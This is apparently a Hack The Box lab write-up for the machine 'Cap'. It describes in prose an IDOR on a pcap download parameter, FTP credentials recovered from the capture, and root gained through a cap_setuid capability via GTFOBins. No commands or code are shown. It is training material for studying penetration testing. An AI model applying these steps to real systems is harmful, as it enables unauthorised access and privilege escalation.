Cap

TARGET IP: 10.10.10.245

HOST IP: 10.10.16.3

RECON

WEBSITE

  • Looks like a data analytics page that I am currently signed into as Nathan.

  • The dropdown menu page under the user doesn't do anything. All of the buttons including the Logout don't point towards anything or do anything.

  • Take a look at the source code:

  • There is a lot there but it looks like we have some new information:

    • We have a user named Nathan and possibly other users Rashed, Kaji Patha, and Ratul Hamba.

  • Checking out curl doesn't give us the version number of the gunicorn web server.

  • If we go to the home tab in the upper right and click on Network Status, we get some really good info about the machine without actually having to run an NMAP scan.

    • Looks like Ports 21, 22, and 80 are open.

  • When I try something in the search bar, nothing pops up but a parameter is added to the URL.

  • I captured a packet with Burpsuite and received the following.

  • Let's try the Security Snapshot button. This appears to grab some packet data over a 5 second period and creates a pcap file to look at.

  • We can also see that the URL shows a data parameter that after first use equals 1 and sequentially goes up. Let's set the parameter to 0 and see what it spits out. We'll also grab the pcap file from it.

  • We can open this pcap file in wireshark to take a look at it and see if we can find any good information.

  • WiresharkScanning through the Wireshark capture, we quickly find FTP credentials for the User Nathan.

  • We can now log into nathan's account, list out the current working directory, and download the user flag.

  • On our host system we can then look into the text file for the first flag.

WAPPALYZER

  • The backend Language appears to be Python

  • Utilizes Gunicorn as a webserver

    • The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.

NMAP

ENUMERATION

GOBUSTER

SUBDOMAIN

  • None of these are new to me and don't provide any new information.

TARGET ENUMERATION

  • Now that we have credentials for nathan. We can spend some time exploring the target system for possible privilege escalation.

  • I'm going to use the credentials to log in through SSH.

  • Try checking out what sudo privileges we have.

  • Unfortunately, we have none so let's go digging around.

  • I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out.

  • I came across something interesting.

  • I can verify the capability functions with the following command. This essentially allows for certain processes to have root privleges. Similar to SUID.

  • This is great information as having the capabilities for cap_setuid set is a particularly vulnerable situation.

  • Hacktricks and GTFOBins both have sections for exploiting this for privilege escalation.

  • Let's go with the privilege escalation from GTFOBins.

  • And now I have root privileges.

  • Let's go get the root flag.

PreviousOptimumNextKnife

Last updated